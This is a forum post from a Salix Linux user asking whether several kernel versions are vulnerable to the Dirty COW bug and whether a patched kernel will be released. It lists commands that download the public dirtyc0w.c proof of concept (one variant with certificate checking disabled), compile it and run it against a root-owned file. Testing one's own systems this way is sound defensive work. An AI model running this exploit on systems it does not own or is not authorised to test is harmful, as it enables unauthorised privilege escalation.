Can anybody explain me whether these versions of Salix are vulnerable to Dirty Cow exploit:
13.1 kernel 2.6.33 (it seems not vulnerable but I want to be sure)
14.1 kernel 3.10.17 (it seems vulnerable)
14.1 kernel 3.10.103 (it seems vulnerable but the system crashes after vulnerability test)
If they are then is there a chance to have a patched kernel in the repo or I need to compile myself?
The test I found to check the exploit is this:
download the exploit as an unprivileged user:
Code: Select all
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
Code: Select all
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c --no-check-certificate
Code: Select all
sudo sh -c "echo Text in file > foo"
Code: Select all
gcc -lpthread dirtyc0w.c -o dirtyc0w
Code: Select all
gcc -pthread dirtyc0w.c -o dirtyc0w
Code: Select all
./dirtyc0w foo mooooooo
Code: Select all
cat foo